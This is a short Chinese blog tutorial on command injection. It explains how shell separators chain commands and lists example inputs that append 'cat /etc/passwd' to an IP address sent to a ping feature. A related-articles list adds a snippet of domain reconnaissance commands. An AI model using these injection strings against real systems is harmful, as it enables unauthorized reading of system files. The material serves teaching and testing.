首页 > 其他分享 >渗透测试-命令注入

渗透测试-命令注入

时间:2023-04-12 14:36:47浏览次数:47  
标签:渗透 cat commandA etc commandB passwd 测试 执行 注入

背景:
有些场景支持直接传参给系统命令并调用的情况;如输入一个ip 执行ping命令看是否能ping同;这种场景如果没有对参数进行校验直接传参就会存在命令注入的情况;
首先需要连接下通过命令连接符号连接的命令执行策略:

commandA; commandB //commandA无论正确与否都会执行commandB
commandA & commandB //commandA后台执行, commandA 和 commandB同时执行
commandA && commandB //commandA 执行成功后才会执行commandB
commandA | commandB //管道操作 commandA执行的结果作为commandB执行的参数, 无论A正确执行与否都会执行commandB
commandA || commandB //commandA执行失败时才会执行commandB

鉴于以上特性,可以在输入时进行命令注入:

127.0.0.1 ; cat /etc/passwd
127.0.0.1 & cat /etc/passwd
127.0.0.1 && cat /etc/passwd
127.0.0.1 | cat /etc/passwd
127.1 || cat /etc/passwd

标签:渗透,cat,commandA,etc,commandB,passwd,测试,执行,注入
From: https://www.cnblogs.com/gatling/p/17309666.html

相关文章

  • 性能测试了解服务架构
    软件架构与部署性能测试软件服务架构一般分为,最外层lvs-nginx-tomcat-redis-mysqlmermaidgraphLRlvs-->nginx主1-->tomcat1-->redis1-->mysql1nginx主1-->tomcat2-->redis1lvs-->nginx主2-->tomcat3-->redis2-->mysql2nginx主2-->tomcat4-->redis2本文永久更新地址:......
  • 性能测试之jmeter脚本监控3
    1,influxDb数据库2,安装influxDB服务3,配置jmeter监听器,后端监听器4,配置grafana可视化工具本文永久更新地址:1,influxDb数据库InfluxDB以更少的代码为分析、物联网和云原生服务构建实时应用程序。其核心是一个数据库,专门用于处理由传感器、应用程序和基础设施生成的海量数......
  • 逆天啦!一键执行混沌测试,服务会挂的,需要跑路吗?在线等!
    一大早来公司老板给小T安排做一个系统的业务场景稳定性测试,我一脸蒙呀,老板解释到:就是让我一顿乱整,看看系统会不会挂掉,天下还有这等好事儿?哈哈,我和老板说,我有办法了,搞死系统可别怪我呀,老板发话了:测试环境搞死也没事,主要是要测试出系统的健壮性!话是说出了口,但实际真的很容易吗?急得......
  • OpenSSL测试-SM4
    任务详情使用OpenSSL编程对内容为"所有同学的8位学号(数字)"的文件进行加密解密,密钥要包含你的8位学号,提交代码和运行结果截图。(选做(10’))编译:gcc-gsm4txtcode.c-osm4_en_de_txt-L/usr/lib-lssl-lcrypto就像这样运行:enout.txt是加密后的输出、deout.txt是解密后的输......
  • Vulnhub之KB Vuln 3靶机详细测试过程
    KBVuln3作者:jasonhuawen识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/KBVuln3]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|ScreenView:UniqueHosts......
  • 性能测试了解服务架构
    软件架构与部署性能测试软件服务架构一般分为,最外层lvs-nginx-tomcat-redis-mysqlmermaidgraphLRlvs-->nginx主1-->tomcat1-->redis1-->mysql1nginx主1-->tomcat2-->redis1lvs-->nginx主2-->tomcat3-->redis2-->mysql2nginx主2-->tomcat4-->redis2本文永久更新地址:......
  • OpenSSL测试-SM4
    在openEuler(推荐)或Ubuntu或Windows(不推荐)中完成下面任务使用OpenSSL的命令对你的8位学号(数字)进行加密解密,密钥的前8个字节为你的8位学号,提交过程截图(5')使用OpenSSL编程对对"你的8位学号(数字)"进行加密解密,提交代码和运行结果截图。(10’)使用OpenSSL编程对内容为"所有同学......
  • OpenSSL测试-SM3
    OpenSSL测试-SM3任务详情在openEuler(推荐)或Ubuntu或Windows(不推荐)中完成下面任务使用OpenSSL的命令计算你的8位学号的摘要值(SM3),提交截图(5')使用OpenSSL编程对计算"你的8位学号"SM3摘要值,提交代码和运行结果截图。(10’)使用OpenSSL编程对计算内容为"所有同学的8位学号"的文......
  • OpenSSL测试-随机数
    任务详情在openEuler(推荐)或Ubuntu或Windows(不推荐)中完成下面任务使用OpenSSL定义一个私有函数staticintgetRandom(char*r,intlength),获取length个字节的随机数(5‘)把上述函数集成到src中的sdf.c中的SDF_GenerateRandom中(5')在test中的main.c调用SDF_GenerateRandom......
  • 简单域渗透操作
    信息收集netuser/domainnetgroup/domainnetgroup"DomainAdmins"/domain#这种方法没办法收集到组的嵌套关系#可以使用PowerViewImport-Module.\PowerView.ps1Get-NetdomainGet-NetUser|selectcn#思路是找高权限用户,找哪一台主机有该用户的登录会话,用普......